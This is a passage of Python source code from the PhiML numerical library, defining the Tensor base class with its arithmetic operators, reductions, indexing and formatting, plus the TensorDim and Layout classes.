DType:\n \"\"\" Data type of the elements of this `Tensor`. \"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def shape(self) -> Shape:\n \"\"\" The `Shape` lists the dimensions with their sizes, names and types. \"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def default_backend(self) -> Backend:\n from ._ops import choose_backend_t\n return choose_backend_t(self)\n\n def _with_shape_replaced(self, new_shape: Shape):\n raise NotImplementedError(self.__class__)\n\n def _with_natives_replaced(self, natives: list):\n \"\"\" Replaces all n _natives() of this Tensor with the first n elements of the list and removes them from the list. \"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def rank(self) -> int:\n \"\"\"\n Number of explicit dimensions of this `Tensor`. Equal to `tensor.shape.rank`.\n This replaces [`numpy.ndarray.ndim`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.ndim.html) /\n [`torch.Tensor.dim`](https://pytorch.org/docs/master/generated/torch.Tensor.dim.html) /\n [`tf.rank()`](https://www.tensorflow.org/api_docs/python/tf/rank) /\n [`jax.numpy.ndim()`](https://jax.readthedocs.io/en/latest/_autosummary/jax.numpy.ndim.html).\n \"\"\"\n return self.shape.rank\n\n @property\n def _is_tracer(self) -> bool:\n \"\"\"\n Tracers store additional internal information.\n They should not be converted to `native()` in intermediate operations.\n \n TensorStack prevents performing the actual stack operation if one of its component tensors is special.\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _to_dict(self):\n return cached(self)._to_dict()\n\n def __len__(self):\n return self.shape.volume if self.rank == 1 else NotImplemented\n\n def __bool__(self):\n assert self.rank == 0, f\"Cannot convert tensor with non-empty shape {self.shape} to bool. Use tensor.any or tensor.all instead.\"\n from ._ops import all_\n if not self.default_backend.supports(Backend.jit_compile): # NumPy\n return bool(self.native()) if self.rank == 0 else bool(all_(self).native())\n else:\n # __bool__ does not work with TensorFlow tracing.\n # TensorFlow needs to see a tf.Tensor in loop conditions but won't allow bool() invocations.\n # However, this function must always return a Python bool.\n raise AssertionError(\"To evaluate the boolean value of a Tensor, use 'Tensor.all'.\")\n\n @property\n def all(self):\n \"\"\" Whether all values of this `Tensor` are `True` as a native bool. \"\"\"\n from ._ops import all_, cast\n if self.rank == 0:\n return cast(self, DType(bool)).native()\n else:\n return all_(self, dim=self.shape).native()\n\n @property\n def any(self):\n \"\"\" Whether this `Tensor` contains a `True` value as a native bool. \"\"\"\n from ._ops import any_, cast\n if self.rank == 0:\n return cast(self, DType(bool)).native()\n else:\n return any_(self, dim=self.shape).native()\n\n @property\n def mean(self):\n \"\"\" Mean value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import mean\n return mean(self, dim=self.shape).native()\n\n @property\n def finite_mean(self):\n \"\"\" Mean value of all finite values in this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_mean\n return finite_mean(self, dim=self.shape).native()\n\n @property\n def std(self):\n \"\"\" Standard deviation of this `Tensor` as a native scalar. \"\"\"\n from ._ops import std\n return std(self, dim=self.shape).native()\n\n @property\n def sum(self):\n \"\"\" Sum of all values of this `Tensor` as a native scalar. \"\"\"\n from ._ops import sum_\n return sum_(self, dim=self.shape).native()\n\n @property\n def finite_sum(self):\n \"\"\" Sum of all finite values of this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_sum\n return finite_sum(self, dim=self.shape).native()\n\n @property\n def min(self):\n \"\"\" Minimum value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import min_\n return min_(self, dim=self.shape).native()\n\n @property\n def finite_min(self):\n \"\"\" Minimum finite value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_min\n return finite_min(self, dim=self.shape).native()\n\n @property\n def max(self):\n \"\"\" Maximum value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import max_\n return max_(self, dim=self.shape).native()\n\n @property\n def finite_max(self):\n \"\"\" Maximum finite value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_max\n return finite_max(self, dim=self.shape).native()\n\n @property\n def real(self) -> 'Tensor':\n \"\"\"\n Returns the real part of this tensor.\n\n See Also:\n `phiml.math.real()`\n \"\"\"\n from ._ops import real\n return real(self)\n\n @property\n def imag(self) -> 'Tensor':\n \"\"\"\n Returns the imaginary part of this tensor.\n If this tensor does not store complex numbers, returns a zero tensor with the same shape and dtype as this tensor.\n\n See Also:\n `phiml.math.imag()`\n \"\"\"\n from ._ops import imag\n return imag(self)\n\n @property\n def available(self) -> bool:\n \"\"\"\n A tensor is available if it stores concrete values and these can currently be read.\n\n Tracers used inside jit compilation are typically not available.\n\n See Also:\n `phiml.math.jit_compile()`.\n \"\"\"\n if self._is_tracer:\n return False\n natives = self._natives()\n natives_available = [choose_backend(native).is_available(native) for native in natives]\n return all(natives_available)\n\n @property\n def device(self) -> Union[ComputeDevice, None]:\n \"\"\"\n Returns the `ComputeDevice` that this tensor is allocated on.\n The device belongs to this tensor's `default_backend`.\n\n See Also:\n `Tensor.default_backend`.\n \"\"\"\n natives = self._natives()\n if not natives:\n return None\n return self.default_backend.get_device(natives[0])\n\n def __int__(self):\n return int(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __float__(self):\n return float(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __complex__(self):\n return complex(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __index__(self):\n assert self.shape.volume == 1, f\"Only scalar tensors can be converted to index but has shape {self.shape}\"\n assert self.dtype.kind == int, f\"Only int tensors can be converted to index but dtype is {self.dtype}\"\n return int(self.native())\n\n def __repr__(self):\n return format_tensor(self, PrintOptions())\n\n def _repr_pretty_(self, printer, cycle):\n printer.text(format_tensor(self, PrintOptions(colors=DEFAULT_COLORS)))\n\n def __format__(self, format_spec: str):\n if BROADCAST_FORMATTER.values is not None:\n return BROADCAST_FORMATTER.register_formatted(self, format_spec)\n specs = format_spec.split(':')\n layout_ = 'auto'\n for possible_layout in ['summary', 'full', 'row', 'numpy']:\n if possible_layout in specs:\n assert layout_ == 'auto', f\"Two layout identifiers encountered in '{format_spec}'\"\n layout_ = possible_layout\n include_shape = 'shape' in specs or (False if 'no-shape' in specs else None)\n include_dtype = 'dtype' in specs or (False if 'no-dtype' in specs else None)\n color = 'color' in specs or (False if 'no-color' in specs else None)\n threshold = 8\n float_format = None\n for spec in specs:\n if spec.startswith('threshold='):\n threshold = int(spec[len('threshold='):])\n elif '.' in spec:\n float_format = spec\n result = format_tensor(self, PrintOptions(layout_, float_format, threshold, color, include_shape, include_dtype))\n return result\n\n def __getitem__(self, item) -> 'Tensor':\n if isinstance(item, Tensor):\n if item.dtype.kind == bool:\n from ._ops import boolean_mask\n return boolean_mask(self, item.shape, item)\n elif item.dtype.kind == int:\n from ._ops import gather\n return gather(self, item)\n else:\n raise AssertionError(f\"Index tensor must be of dtype int (gather) or bool (boolean_mask) but got {item}\")\n item = slicing_dict(self, item)\n selections = {}\n sliced = self\n for dim, selection in item.items():\n if dim not in self.shape:\n continue\n selection = self.shape.prepare_gather(dim, selection)\n # Either handle slicing directly or add it to the dict\n if isinstance(selection, (tuple, list)):\n from ._magic_ops import stack\n result = [sliced[{dim: i}] for i in selection]\n stack_dim = sliced.shape[dim].after_gather({dim: selection})\n sliced = stack(result, stack_dim)\n elif isinstance(selection, Tensor) and selection.dtype.kind == bool:\n from ._ops import boolean_mask\n sliced = boolean_mask(sliced, dim, selection)\n elif isinstance(selection, Tensor) and selection.dtype.kind == int:\n from ._ops import gather\n sliced = gather(sliced, selection, dims=dim)\n else:\n selections[dim] = selection\n return sliced._getitem(selections) if selections else sliced\n\n def _getitem(self, selection: dict) -> 'Tensor':\n \"\"\"\n Slice the tensor along specified dimensions.\n\n Args:\n selection: dim_name: str -> Union[int, slice]\n selection: dict: \n\n Returns:\n\n \"\"\"\n raise NotImplementedError()\n\n def __setitem__(self, key, value):\n raise SyntaxError(\"Tensors are not editable to preserve the autodiff chain. This feature might be added in the future. To update part of a tensor, use math.where() or math.scatter()\")\n\n def __unstack__(self, dims: Tuple[str, ...]) -> Tuple['Tensor', ...]: # from phiml.math.magic.Sliceable\n if len(dims) == 1:\n return self._unstack(dims[0])\n else:\n return NotImplemented\n\n def _unstack(self, dim: str):\n \"\"\"\n Splits this tensor along the specified dimension.\n The returned tensors have the same dimensions as this tensor save the unstacked dimension.\n\n Raises an error if the dimension is not part of the `Shape` of this `Tensor`.\n\n See Also:\n `TensorDim.unstack()`\n\n Args:\n dim: name of dimension to unstack\n\n Returns:\n tuple of tensors\n\n \"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def __stack__(values: tuple, dim: Shape, **_kwargs) -> 'Tensor':\n from ._ops import stack_tensors\n return stack_tensors(values, dim)\n\n def __expand__(self, dims: Shape, **kwargs) -> 'Tensor':\n return expand_tensor(self, dims)\n\n @staticmethod\n def __concat__(values: tuple, dim: str, **kwargs) -> 'Tensor':\n from ._ops import concat_tensor\n return concat_tensor(values, dim)\n\n def __replace_dims__(self, dims: Tuple[str, ...], new_dims: Shape, **kwargs) -> 'Tensor':\n from ._magic_ops import rename_dims\n return self._with_shape_replaced(rename_dims(self.shape, dims, new_dims))\n\n def __unpack_dim__(self, dim: str, unpacked_dims: Shape, **kwargs) -> 'Tensor':\n if self.shape.is_uniform:\n native = self.native(self.shape.names)\n new_shape = self.shape.without(dim)\n i = self.shape.index(dim)\n for d in unpacked_dims:\n new_shape = new_shape._expand(d, pos=i)\n i += 1\n native_reshaped = choose_backend(native).reshape(native, new_shape.sizes)\n return NativeTensor(native_reshaped, new_shape)\n else:\n tensors = self._tensors\n if dim == self._stack_dim.name:\n for udim in unpacked_dims:\n tensors = [TensorStack(tensors[o::len(tensors)//udim.size], udim) for o in range(len(tensors)//udim.size)]\n assert len(tensors) == 1\n return tensors[0]\n raise NotImplementedError\n\n def __pack_dims__(self, dims: Tuple[str, ...], packed_dim: Shape, pos: Union[int, None], **kwargs) -> 'Tensor':\n order = self.shape._order_group(dims)\n if self.shape.is_uniform:\n native = self.native(order)\n if pos is None:\n pos = min(self.shape.indices(dims))\n new_shape = self.shape.without(dims)._expand(packed_dim.with_sizes([self.shape.only(dims).volume]), pos)\n native = choose_backend(native).reshape(native, new_shape.sizes)\n return NativeTensor(native, new_shape)\n else:\n from ._ops import concat_tensor\n from ._magic_ops import pack_dims\n value = cached(self)\n assert isinstance(value, TensorStack)\n assert value._stack_dim.name in dims\n inner_packed = [pack_dims(t, dims, packed_dim) for t in value._tensors]\n return concat_tensor(inner_packed, packed_dim.name)\n\n def __cast__(self, dtype: DType):\n return self._op1(lambda native: choose_backend(native).cast(native, dtype=dtype))\n\n def dimension(self, name: Union[str, Shape]) -> 'TensorDim':\n \"\"\"\n Returns a reference to a specific dimension of this tensor.\n This is equivalent to the syntax `tensor.`.\n\n The dimension need not be part of the `Tensor.shape` in which case its size is 1.\n\n Args:\n name: dimension name\n\n Returns:\n `TensorDim` corresponding to a dimension of this tensor\n \"\"\"\n if isinstance(name, str):\n return TensorDim(self, name)\n elif isinstance(name, Shape):\n return TensorDim(self, name.name)\n else:\n raise ValueError(name)\n\n def pack(self, dims, packed_dim):\n \"\"\" See `pack_dims()` \"\"\"\n from ._ops import pack_dims\n return pack_dims(self, dims, packed_dim)\n\n def unpack(self, dim, unpacked_dims):\n \"\"\" See `unpack_dim()` \"\"\"\n from ._ops import unpack_dim\n return unpack_dim(self, dim, unpacked_dims)\n\n def __getattr__(self, name):\n if name.startswith('__'): # called by hasattr in magic ops\n raise AttributeError\n if name.startswith('_'):\n raise AttributeError(f\"'{type(self)}' object has no attribute '{name}'\")\n if name == 'is_tensor_like': # TensorFlow replaces abs() while tracing and checks for this attribute\n raise AttributeError(f\"'{type(self)}' object has no attribute '{name}'\")\n assert name not in ('shape', '_shape', 'tensor'), name\n return TensorDim(self, name)\n\n def __add__(self, other):\n return self._op2(other, lambda x, y: x + y, lambda x, y: choose_backend(x, y).add(x, y), 'add', '+')\n\n def __radd__(self, other):\n return self._op2(other, lambda x, y: y + x, lambda x, y: choose_backend(x, y).add(y, x), 'radd', '+')\n\n def __sub__(self, other):\n return self._op2(other, lambda x, y: x - y, lambda x, y: choose_backend(x, y).sub(x, y), 'sub', '-')\n\n def __rsub__(self, other):\n return self._op2(other, lambda x, y: y - x, lambda x, y: choose_backend(x, y).sub(y, x), 'rsub', '-')\n\n def __and__(self, other):\n return self._op2(other, lambda x, y: x & y, lambda x, y: choose_backend(x, y).and_(x, y), 'and', '&')\n\n def __rand__(self, other):\n return self._op2(other, lambda x, y: y & x, lambda x, y: choose_backend(x, y).and_(y, x), 'rand', '&')\n\n def __or__(self, other):\n return self._op2(other, lambda x, y: x | y, lambda x, y: choose_backend(x, y).or_(x, y), 'or', '|')\n\n def __ror__(self, other):\n return self._op2(other, lambda x, y: y | x, lambda x, y: choose_backend(x, y).or_(y, x), 'ror', '|')\n\n def __xor__(self, other):\n return self._op2(other, lambda x, y: x ^ y, lambda x, y: choose_backend(x, y).xor(x, y), 'xor', '^')\n\n def __rxor__(self, other):\n return self._op2(other, lambda x, y: y ^ x, lambda x, y: choose_backend(x, y).xor(y, x), 'rxor', '^')\n\n def __mul__(self, other):\n return self._op2(other, lambda x, y: x * y, lambda x, y: choose_backend(x, y).mul(x, y), 'mul', '*')\n\n def __rmul__(self, other):\n return self._op2(other, lambda x, y: y * x, lambda x, y: choose_backend(x, y).mul(y, x), 'rmul', '*')\n\n def __truediv__(self, other):\n return self._op2(other, lambda x, y: x / y, lambda x, y: choose_backend(x, y).div(x, y), 'truediv', '/')\n\n def __rtruediv__(self, other):\n return self._op2(other, lambda x, y: y / x, lambda x, y: choose_backend(x, y).div(y, x), 'rtruediv', '/')\n\n def __divmod__(self, other):\n return self._op2(other, lambda x, y: divmod(x, y), lambda x, y: divmod(x, y), 'divmod', 'divmod')\n\n def __rdivmod__(self, other):\n return self._op2(other, lambda x, y: divmod(y, x), lambda x, y: divmod(y, x), 'rdivmod', 'divmod')\n\n def __floordiv__(self, other):\n return self._op2(other, lambda x, y: x // y, lambda x, y: choose_backend(x, y).floordiv(x, y), 'floordiv', '//')\n\n def __rfloordiv__(self, other):\n return self._op2(other, lambda x, y: y // x, lambda x, y: choose_backend(x, y).floordiv(y, x), 'rfloordiv', '//')\n\n def __pow__(self, power, modulo=None):\n assert modulo is None\n return self._op2(power, lambda x, y: x ** y, lambda x, y: choose_backend(x, y).pow(x, y), 'pow', '**')\n\n def __rpow__(self, other):\n return self._op2(other, lambda x, y: y ** x, lambda x, y: choose_backend(x, y).pow(y, x), 'rpow', '**')\n\n def __mod__(self, other):\n return self._op2(other, lambda x, y: x % y, lambda x, y: choose_backend(x, y).mod(x, y), 'mod', '%')\n\n def __rmod__(self, other):\n return self._op2(other, lambda x, y: y % x, lambda x, y: choose_backend(x, y).mod(y, x), 'rmod', '%')\n\n def __eq__(self, other):\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(self is other)\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(self.shape) != set(other.shape):\n return wrap(False)\n from ._ops import close\n return wrap(close(self, other, rel_tolerance=0, abs_tolerance=0))\n if other is None:\n other = float('nan')\n return self._op2(other, lambda x, y: x == y, lambda x, y: choose_backend(x, y).equal(x, y), 'eq', '==')\n\n def __ne__(self, other):\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(self is not other)\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(self.shape) != set(other.shape):\n return wrap(True)\n from ._ops import close\n return wrap(not close(self, other, rel_tolerance=0, abs_tolerance=0))\n if other is None:\n other = float('nan')\n return self._op2(other, lambda x, y: x != y, lambda x, y: choose_backend(x, y).not_equal(x, y), 'ne', '!=')\n\n def __lt__(self, other):\n return self._op2(other, lambda x, y: x < y, lambda x, y: choose_backend(x, y).greater_than(y, x), 'lt', '<')\n\n def __le__(self, other):\n return self._op2(other, lambda x, y: x <= y, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'le', '<=')\n\n def __gt__(self, other):\n return self._op2(other, lambda x, y: x > y, lambda x, y: choose_backend(x, y).greater_than(x, y), 'gt', '>')\n\n def __ge__(self, other):\n return self._op2(other, lambda x, y: x >= y, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'ge', '>=')\n\n def __lshift__(self, other):\n return self._op2(other, lambda x, y: x << y, lambda x, y: choose_backend(x, y).shift_bits_left(x, y), 'lshift', '<<')\n\n def __rlshift__(self, other):\n return self._op2(other, lambda y, x: x << y, lambda y, x: choose_backend(x, y).shift_bits_left(x, y), 'lshift', '<<')\n\n def __rshift__(self, other):\n return self._op2(other, lambda x, y: x >> y, lambda x, y: choose_backend(x, y).shift_bits_right(x, y), 'rshift', '>>')\n\n def __rrshift__(self, other):\n return self._op2(other, lambda y, x: x >> y, lambda y, x: choose_backend(x, y).shift_bits_right(x, y), 'rshift', '>>')\n\n def __abs__(self):\n return self._op1(lambda t: choose_backend(t).abs(t))\n\n def __round__(self, n=None):\n return self._op1(lambda t: choose_backend(t).round(t))\n\n def __copy__(self):\n return self._op1(lambda t: choose_backend(t).copy(t, only_mutable=True))\n\n def __deepcopy__(self, memodict={}):\n return self._op1(lambda t: choose_backend(t).copy(t, only_mutable=False))\n\n def __neg__(self) -> 'Tensor':\n return self._op1(lambda t: -t)\n\n def __invert__(self) -> 'Tensor':\n return self._op1(lambda t: choose_backend(t).invert(t))\n\n def __reversed__(self):\n assert self.shape.channel.rank == 1\n return self[::-1]\n\n def __iter__(self):\n if self.rank == 1:\n return iter(self.native())\n elif self.rank == 0:\n return iter([self.native()])\n else:\n from ._ops import reshaped_native\n native = reshaped_native(self, [self.shape])\n return iter(native)\n\n def __matmul__(self, other):\n assert isinstance(other, Tensor), f\"Matmul '@' requires two Tensor arguments but got {type(other)}\"\n match_names = self.shape.dual.as_batch().names\n if not match_names: # this is not a matrix\n assert self.shape.primal.only(other.shape).is_empty, f\"Cannot compute matmul {self.shape} @ {other.shape}. First argument is not a matrix; it has no dual dimensions.\"\n return self * other\n match_primal = other.shape.only(match_names, reorder=True)\n if not match_primal:\n assert non_batch(other).non_dual.rank == 1, f\"Cannot multiply {self.shape} @ {other.shape} because arg2 does not have appropriate non-dual dimensions\"\n match_primal = non_batch(other).non_dual\n match_dual = self.shape.dual.only(match_primal.as_dual(), reorder=True)\n left_arg = pack_dims(self, match_dual, dual('_reduce'))\n right_arg = pack_dims(other, match_primal, channel('_reduce'))\n from ._ops import dot\n return dot(left_arg, '~_reduce', right_arg, '_reduce')\n\n # def __rmatmul__(self, other):\n\n def _tensor(self, other) -> 'Tensor':\n if isinstance(other, Tensor):\n return other\n elif isinstance(other, (tuple, list)) and any(isinstance(v, Tensor) for v in other):\n if 'vector' in self.shape:\n outer_dim = self.shape['vector']\n elif self.shape.channel_rank == 1:\n outer_dim = self.shape.channel\n else:\n raise ValueError(f\"Cannot combine tensor of shape {self.shape} with tuple {tuple([type(v).__name__ for v in other])}\")\n remaining_shape = self.shape.without(outer_dim)\n other_items = [v if isinstance(v, Tensor) else compatible_tensor(v, compat_shape=remaining_shape, compat_natives=self._natives(), convert=False) for v in other]\n other_stacked = stack(other_items, outer_dim, expand_values=True)\n return other_stacked\n else:\n return compatible_tensor(other, compat_shape=self.shape, compat_natives=self._natives(), convert=False)\n\n def _op1(self, native_function) -> 'Tensor':\n \"\"\"\n Transform the values of this tensor given a function that can be applied to any native tensor.\n\n Args:\n native_function:\n\n Returns:\n\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _op2(self, other, operator: Callable, native_function: Callable, op_name: str = 'unknown', op_symbol: str = '?') -> 'Tensor':\n \"\"\"\n Apply a broadcast operation on two tensors.\n\n Args:\n other: second argument\n operator: function (Tensor, Tensor) -> Tensor, used to propagate the operation to children tensors to have Python choose the callee\n native_function: function (native tensor, native tensor) -> native tensor\n op_name: Name of the python function without leading and trailing `__`.\n Examples: 'add', 'radd', 'sub', 'mul', 'and', 'eq', 'ge'.\n op_symbol: Operation symbol, such as '+', '-', '&', '%', '>='\n\n Returns:\n `Tensor`\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _natives(self) -> tuple:\n raise NotImplementedError(self.__class__)\n\n def _spec_dict(self) -> dict:\n raise NotImplementedError(self.__class__)\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n raise NotImplementedError(cls)\n\n def _expand(self):\n \"\"\" Expands all compressed tensors to their defined size as if they were being used in `Tensor.native()`. \"\"\"\n warnings.warn(\"Tensor._expand() is deprecated, use cached(Tensor) instead.\", DeprecationWarning)\n raise NotImplementedError(self.__class__)\n\n def _simplify(self):\n \"\"\" Does not cache this value but if it is already cached, returns the cached version. \"\"\"\n return self\n\n\nTensorOrTree = TypeVar('TensorOrTree', Tensor, PhiTreeNode, numbers.Number, bool, tuple, list, dict)\n\n\nclass TensorDim(BoundDim):\n \"\"\"\n Reference to a specific dimension of a `Tensor`.\n\n To obtain a `TensorDim`, use `Tensor.dimension()` or the syntax `tensor.`.\n\n Indexing a `TensorDim` as `tdim[start:stop:step]` returns a sliced `Tensor`.\n\n See the documentation at https://tum-pbs.github.io/PhiML/Math.html#indexing-slicing-unstacking .\n \"\"\"\n\n def __init__(self, tensor: Tensor, name: str):\n super().__init__(tensor, name)\n self.tensor = tensor\n\n def __len__(self):\n warnings.warn(\"Use Tensor.dim.size instead of len(Tensor.dim). len() only supports with integer sizes.\", DeprecationWarning)\n return self.size\n\n def as_batch(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *batch*. \"\"\"\n return self._as(BATCH_DIM, name)\n\n def as_spatial(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *spatial*. \"\"\"\n return self._as(SPATIAL_DIM, name)\n\n def as_channel(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *channel*. \"\"\"\n return self._as(CHANNEL_DIM, name)\n\n def as_instance(self, name: str = None):\n \"\"\" Returns a shallow copy of the `Tensor` where the type of this dimension is *instance*. \"\"\"\n return self._as(INSTANCE_DIM, name)\n\n def as_type(self, dim_type: Union[Callable, str]):\n return self._as(dim_type('d').type if callable(dim_type) else dim_type, None)\n\n def _as(self, dim_type: str, name: Union[str, None]):\n if not self.exists:\n return self.tensor\n shape = self.tensor.shape\n new_types = list(shape.types)\n new_types[shape.index(self.name)] = dim_type\n new_names = shape.names\n if name is not None:\n new_names = list(new_names)\n new_names[shape.index(self.name)] = name\n new_shape = Shape(shape.sizes, tuple(new_names), tuple(new_types), shape.item_names)\n return self.tensor._with_shape_replaced(new_shape)\n\n @property\n def index(self):\n return self.tensor.shape.index(self.name)\n\n def split(self, split_dimensions: Shape):\n \"\"\" See `phiml.math.unpack_dim()` \"\"\"\n warnings.warn(\"dim.split() is deprecated. Use math.split_dims() instead.\", stacklevel=2)\n from ._magic_ops import unpack_dim\n return unpack_dim(self.tensor, self.name, split_dimensions)\n\n def __matmul__(self, other):\n from ._ops import dot\n if isinstance(other, BoundDim):\n return dot(self.obj, (self.name,), other.obj, (other.name,))\n if isinstance(other, (tuple, list)):\n other = wrap(other, self.obj.shape[self.name])\n if isinstance(other, Tensor):\n assert self.name in other.shape, f\"Canno reduce '{self.name}' of tensor with shape {self.obj.shape} against tensor with shape {other.shape}. Dimension must be present on both tensors.\"\n return dot(self.tensor, (self.name,), other, (self.name,))\n else:\n return NotImplemented\n\n __rmul__ = __mul__ = __rmatmul__ = __matmul__\n\n def sum(self):\n from ._ops import sum_\n return sum_(self.tensor, self.name)\n\n def prod(self):\n from ._ops import prod\n return prod(self.tensor, self.name)\n\n\n_EQUALITY_REDUCE = [None]\n\n\n@contextmanager\ndef equality_by_ref():\n \"\"\"\n Enables Tensor.__bool__\n \"\"\"\n _EQUALITY_REDUCE.append('ref')\n try:\n yield None\n finally:\n assert _EQUALITY_REDUCE.pop(-1) == 'ref'\n\n\n@contextmanager\ndef equality_by_shape_and_value():\n \"\"\"\n Enables Tensor.__bool__\n \"\"\"\n _EQUALITY_REDUCE.append('shape_and_value')\n try:\n yield None\n finally:\n assert _EQUALITY_REDUCE.pop(-1) == 'shape_and_value'\n\n\nclass Layout(Tensor):\n \"\"\"\n Tensor representation of a PyTree consisting of only lists, tuples and leaves.\n Leaves can be any Python object or primitive, including tuples and lists.\n The PyTree may be deeper but only the outer `shape.rank` levels are represented as a tensor.\n \"\"\"\n\n def __init__(self, obj, shape: Shape):\n self._obj = obj\n self._shape = shape\n\n @property\n def shape(self) -> Shape:\n return self._shape\n\n @property\n def dtype(self) -> DType:\n if isinstance(self._obj, bool):\n return DType(bool)\n if isinstance(self._obj, int):\n return DType(int, 64)\n elif isinstance(self._obj, (float, complex)):\n return DType(type(self._obj), precision=64)\n else:\n return DType(object)\n\n @property\n def default_backend(self):\n return None\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n order = parse_dim_order(order)\n assert order is None or order == self._shape.names, \"Layout.native() does not allow for changing the dimension order\"\n return self._obj\n\n def numpy(self, order: Union[str, tuple, list, Shape] = None) -> np.ndarray:\n native = self.native(order=order)\n return numpy.asarray(native)\n\n def _getitem(self, selection: dict) -> 'Tensor':\n selection_list = [selection.get(dim, None) for dim in self._shape.names]\n native = self._getitem_recursive(self._obj, tuple(selection_list))\n new_shape = self._shape.after_gather(selection)\n return Layout(native, new_shape)\n\n def __repr__(self):\n return repr(self._obj)\n\n def __format__(self, format_spec):\n if BROADCAST_FORMATTER.values is not None:\n return BROADCAST_FORMATTER.register_formatted(self, format_spec)\n return repr(self._obj)\n\n def _unstack(self, dimension: str):\n if dimension == self._shape.names[0]:\n native = tuple(self._obj.values()) if isinstance(self._obj, dict) else self._obj\n inner_shape = self._shape[1:]\n return tuple([Layout(n, inner_shape) for n in native])\n else:\n raise NotImplementedError()\n\n @staticmethod\n def _getitem_recursive(native, selection: tuple):\n if not selection:\n return native\n native = tuple(native.values()) if isinstance(native, dict) else native\n if len(selection) == 1:\n return native if selection[0] is None else native[selection[0]]\n else:\n if selection[0] is None:\n return type(native)([Layout._getitem_recursive(n, selection[1:]) for n in native])\n if isinstance(selection[0], int):\n return Layout._getitem_recursive(native[selection[0]], selection[1:])\n elif isinstance(selection[0], slice):\n subset = native[selection[0]]\n return type(subset)([Layout._getitem_recursive(n, selection[1:]) for n in subset])\n else:\n raise ValueError(f\"Illegal selection: {selection}\")\n\n def _as_list(self):\n return self._as_list_recursive(self._obj, self._shape.rank, [])\n\n @staticmethod\n def _as_list_recursive(native, dims: int, result: list):\n if dims == 0:\n result.append(native)\n else:\n native = tuple(native.values()) if isinstance(native, dict) else native\n for n in native:\n Layout._as_list_recursive(n, dims - 1, result)\n return result\n\n @property\n def _is_tracer(self) -> bool:\n return False\n\n def __bool__(self):\n assert self.rank == 0, f\"Cannot convert tensor with non-empty shape {self.shape} to bool. Use tensor.any or tensor.all instead.\"\n return bool(self._obj)\n\n def __stack__(self, values: tuple, dim: Shape, **kwargs) -> 'Layout':\n obj = [v.native(self._shape) for v in values]\n new_shape = concat_shapes(dim, self._shape)\n return Layout(obj, new_shape)\n\n @staticmethod\n def __concat__(values: tuple, dim: str, **kwargs) -> 'Shapable':\n return NotImplemented\n\n def __flatten__(self, flat_dim: Shape, flatten_batch: bool):\n if not flatten_batch and self._shape.batch:\n raise NotImplementedError\n return layout(self._as_list(), flat_dim)\n\n def __expand__(self, dims: Shape, **kwargs) -> 'Tensor':\n new_dims = dims.without(self._shape)\n if not new_dims:\n return self\n obj = self._obj\n for dim in reversed(new_dims):\n assert isinstance(dim.size, int), \"Can only expand layouts by integer-sized dimensions\"\n obj = [obj] * dim.size\n return Layout(obj, concat_shapes(new_dims, self._shape))\n\n def __replace_dims__(self, dims: Tuple[str, ...], new_dims: Shape, **kwargs) -> 'Tensor':\n new_shape = self._shape.replace(dims, new_dims)\n return Layout(self._obj, new_shape)\n\n def __pack_dims__(self, dims: Tuple[str, ...], packed_dim: Shape, pos: Union[int, None], **kwargs) -> 'Layout':\n if dims == self.shape.names:\n native = self._as_list()\n return Layout(native, packed_dim.with_size(len(native)))\n else:\n obj = []\n for i in self._shape.only(dims, reorder=True).meshgrid():\n obj.append(self[i].native())\n return Layout(obj, concat_shapes(packed_dim.with_size(self.shape.only(dims).volume), self._shape.without(dims)))\n\n def __unpack_dim__(self, dim: str, unpacked_dims: Shape, **kwargs) -> 'Layout':\n return NotImplemented\n\n def __cast__(self, dtype: DType):\n obj = self._recursive_cast(self._obj, self._shape, dtype)\n return Layout(obj, self._shape)\n\n def __copy__(self):\n return Layout(self._obj, self._shape)\n\n def __iter__(self):\n if self.rank == 1:\n return iter(self._obj)\n elif self.rank == 0:\n return iter([self._obj])\n else:\n return iter(self._as_list())\n\n def __eq__(self, other):\n if _EQUALITY_REDUCE[-1]:\n return Tensor.__eq__(self, other)\n return self._op2(other, lambda x, y: x == y, lambda x, y: x == y, 'eq', '==')\n\n def __ne__(self, other):\n if _EQUALITY_REDUCE[-1]:\n return Tensor.__ne__(self, other)\n return self._op2(other, lambda x, y: x != y, lambda x, y: x != y, 'ne', '!=')\n \n def _assert_close(self, other: Tensor, rel_tolerance: float, abs_tolerance: float, msg: str, verbose: bool):\n from ._ops import assert_close\n inner_test = lambda x, y: assert_close(x, y, rel_tolerance=rel_tolerance, abs_tolerance=abs_tolerance, msg=msg, verbose=verbose)\n return self._op2(other, inner_test, inner_test, 'assert_close', '≈')\n\n def _op2(self, other, operator: Callable, native_function: Callable, op_name: str = 'unknown', op_symbol: str = '?') -> Tensor:\n obj = self._recursive_op2(self._obj, self._shape, other, operator, native_function, op_name)\n new_shape = concat_shapes(self._shape, other.shape.without(self._shape)) if isinstance(other, Tensor) else self._shape\n return Layout(obj, new_shape)\n\n 